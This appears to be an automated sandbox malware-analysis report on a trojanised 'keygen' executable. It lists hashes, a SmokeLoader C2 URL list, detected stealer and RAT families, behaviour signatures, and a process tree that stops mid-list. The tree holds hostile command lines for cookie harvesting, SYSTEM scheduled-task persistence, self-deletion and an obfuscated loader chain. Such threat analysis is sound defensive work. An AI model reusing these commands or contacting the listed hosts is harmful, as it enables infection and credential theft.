Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1798s
  • max time network
    1756s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    06-05-2021 08:37

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 62 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Drops file in System32 directory 32 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 40 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {2D9D0AD7-6A6F-4322-AEE0-2C57A31171D1} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
            PID:1832
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
              4⤵
              • Executes dropped EXE
              PID:1124
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2400
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2524
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
              4⤵
              • Executes dropped EXE
              PID:4444
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5048
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5060
            • C:\Windows\system32\rundll32.exe
              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
              4⤵
              • Windows security modification
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:272
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {DE3F084D-BE37-4785-9F85-1766AEAAA278} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:7544
              • C:\Users\Admin\AppData\Roaming\ihsjssf
                C:\Users\Admin\AppData\Roaming\ihsjssf
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:7836
                • C:\Users\Admin\AppData\Roaming\ihsjssf
                  C:\Users\Admin\AppData\Roaming\ihsjssf
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:7800
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {438CD428-AF11-4941-840F-67AE4AAC8BA8} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:7548
                • C:\Users\Admin\AppData\Roaming\ihsjssf
                  C:\Users\Admin\AppData\Roaming\ihsjssf
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1172
                  • C:\Users\Admin\AppData\Roaming\ihsjssf
                    C:\Users\Admin\AppData\Roaming\ihsjssf
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:7880
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {7D4F2852-D3F1-4D1D-8102-303292C6D5E4} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                3⤵
                  PID:1916
                  • C:\Users\Admin\AppData\Roaming\ihsjssf
                    C:\Users\Admin\AppData\Roaming\ihsjssf
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:7940
                    • C:\Users\Admin\AppData\Roaming\ihsjssf
                      C:\Users\Admin\AppData\Roaming\ihsjssf
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:188
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:1868
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:564
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                2⤵
                • Enumerates connected drives
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:3624
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding A5CE8185A4AA27D7D981430027D099C9 C
                  3⤵
                  • Loads dropped DLL
                  PID:3852
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 0E5A59DBBADADCB203F3F4DFA12EC838
                  3⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:2712
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:2320
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 33DCDE050ED0C120F5315E745C91D0FC M Global\MSI0000
                  3⤵
                    PID:2988
              • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                1⤵
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Suspicious use of WriteProcessMemory
                PID:1852
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1532
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                    3⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1960
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1752
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1900
                  • C:\Users\Admin\AppData\Local\Temp\is-S3SCM.tmp\Install.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-S3SCM.tmp\Install.tmp" /SL5="$30180,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:892
                    • C:\Users\Admin\AppData\Local\Temp\is-6BCV9.tmp\Ultra.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-6BCV9.tmp\Ultra.exe" /S /UID=burnerch1
                      4⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious use of WriteProcessMemory
                      PID:280
                      • C:\Program Files\Mozilla Firefox\VWFHSOJBND\ultramediaburner.exe
                        "C:\Program Files\Mozilla Firefox\VWFHSOJBND\ultramediaburner.exe" /VERYSILENT
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:912
                        • C:\Users\Admin\AppData\Local\Temp\is-TUT6O.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-TUT6O.tmp\ultramediaburner.tmp" /SL5="$20188,281924,62464,C:\Program Files\Mozilla Firefox\VWFHSOJBND\ultramediaburner.exe" /VERYSILENT
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of WriteProcessMemory
                          PID:1080
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            7⤵
                            • Executes dropped EXE
                            PID:1740
                      • C:\Users\Admin\AppData\Local\Temp\3c-88ddb-16c-7578d-0f82600f39895\Kaemovigydo.exe
                        "C:\Users\Admin\AppData\Local\Temp\3c-88ddb-16c-7578d-0f82600f39895\Kaemovigydo.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:1744
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          6⤵
                          • Modifies Internet Explorer settings
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:2004
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:275457 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:240
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:472065 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • NTFS ADS
                            • Suspicious use of SetWindowsHookEx
                            PID:2164
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:340994 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:3932
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:1455121 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2896
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 1468
                              8⤵
                              • Program crash
                              • Suspicious behavior: GetForegroundWindowSpam
                              PID:2344
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2004 CREDAT:2241560 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:3572
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                          6⤵
                            PID:7608
                        • C:\Users\Admin\AppData\Local\Temp\38-cdccd-c56-63cab-c0b0f920128bf\Linyhashaeli.exe
                          "C:\Users\Admin\AppData\Local\Temp\38-cdccd-c56-63cab-c0b0f920128bf\Linyhashaeli.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:856
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sbonrpwc.q00\001.exe & exit
                            6⤵
                              PID:1872
                              • C:\Users\Admin\AppData\Local\Temp\sbonrpwc.q00\001.exe
                                C:\Users\Admin\AppData\Local\Temp\sbonrpwc.q00\001.exe
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:976
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vd5jscmj.z52\installer.exe /qn CAMPAIGN="654" & exit
                              6⤵
                                PID:1344
                                • C:\Users\Admin\AppData\Local\Temp\vd5jscmj.z52\installer.exe
                                  C:\Users\Admin\AppData\Local\Temp\vd5jscmj.z52\installer.exe /qn CAMPAIGN="654"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Enumerates connected drives
                                  • Modifies system certificate store
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  • Suspicious use of FindShellTrayWindow
                                  PID:3120
                                  • C:\Windows\SysWOW64\msiexec.exe
                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vd5jscmj.z52\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vd5jscmj.z52\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620031214 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                    8⤵
                                      PID:2696
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4e2sth3k.0zc\gpooe.exe & exit
                                  6⤵
                                    PID:3448
                                    • C:\Users\Admin\AppData\Local\Temp\4e2sth3k.0zc\gpooe.exe
                                      C:\Users\Admin\AppData\Local\Temp\4e2sth3k.0zc\gpooe.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:3504
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:3040
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:3328
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:7708
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:7664
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rue5b3nl.l22\google-game.exe & exit
                                    6⤵
                                      PID:1020
                                      • C:\Users\Admin\AppData\Local\Temp\rue5b3nl.l22\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\rue5b3nl.l22\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of SetWindowsHookEx
                                        PID:2736
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          PID:2684
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gqhrfhfr.mjr\huesaa.exe & exit
                                      6⤵
                                        PID:2092
                                        • C:\Users\Admin\AppData\Local\Temp\gqhrfhfr.mjr\huesaa.exe
                                          C:\Users\Admin\AppData\Local\Temp\gqhrfhfr.mjr\huesaa.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:1348
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2420
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3520
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3640
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:7796
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oixl4kpy.2dm\askinstall39.exe & exit
                                        6⤵
                                          PID:2932
                                          • C:\Users\Admin\AppData\Local\Temp\oixl4kpy.2dm\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\oixl4kpy.2dm\askinstall39.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2948
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              8⤵
                                                PID:3216
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:3256
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jjwzzsnc.f4t\setup.exe & exit
                                            6⤵
                                              PID:3156
                                              • C:\Users\Admin\AppData\Local\Temp\jjwzzsnc.f4t\setup.exe
                                                C:\Users\Admin\AppData\Local\Temp\jjwzzsnc.f4t\setup.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:3196
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\jjwzzsnc.f4t\setup.exe"
                                                  8⤵
                                                    PID:3472
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 1.1.1.1 -n 1 -w 3000
                                                      9⤵
                                                      • Runs ping.exe
                                                      PID:3484
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4k3aqj54.r1d\Setup_v3.exe & exit
                                                6⤵
                                                  PID:3408
                                                  • C:\Users\Admin\AppData\Local\Temp\4k3aqj54.r1d\Setup_v3.exe
                                                    C:\Users\Admin\AppData\Local\Temp\4k3aqj54.r1d\Setup_v3.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2084
                                                    • C:\Windows\SysWOW64\at.exe
                                                      "C:\Windows\System32\at.exe"
                                                      8⤵
                                                        PID:3864
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                        8⤵
                                                          PID:3704
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\System32\cmd.exe
                                                            9⤵
                                                              PID:3756
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                                10⤵
                                                                  PID:1680
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                  Fessura.exe.com Z
                                                                  10⤵
                                                                    PID:2604
                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                                      11⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2960
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                        12⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:3540
                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                        12⤵
                                                                        • Executes dropped EXE
                                                                        PID:2140
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 127.0.0.1 -n 30
                                                                    10⤵
                                                                    • Runs ping.exe
                                                                    PID:2912
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                                8⤵
                                                                  PID:3552
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1qu3jcj5.sxc\toolspab1.exe & exit
                                                              6⤵
                                                                PID:3620
                                                                • C:\Users\Admin\AppData\Local\Temp\1qu3jcj5.sxc\toolspab1.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\1qu3jcj5.sxc\toolspab1.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:2068
                                                                  • C:\Users\Admin\AppData\Local\Temp\1qu3jcj5.sxc\toolspab1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\1qu3jcj5.sxc\toolspab1.exe
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:3836
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tusynje1.dd5\005.exe & exit
                                                                6⤵
                                                                  PID:3720
                                                                  • C:\Users\Admin\AppData\Local\Temp\tusynje1.dd5\005.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\tusynje1.dd5\005.exe
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                    PID:3784
                                                                • C:\Windows\System32\cmd.exe
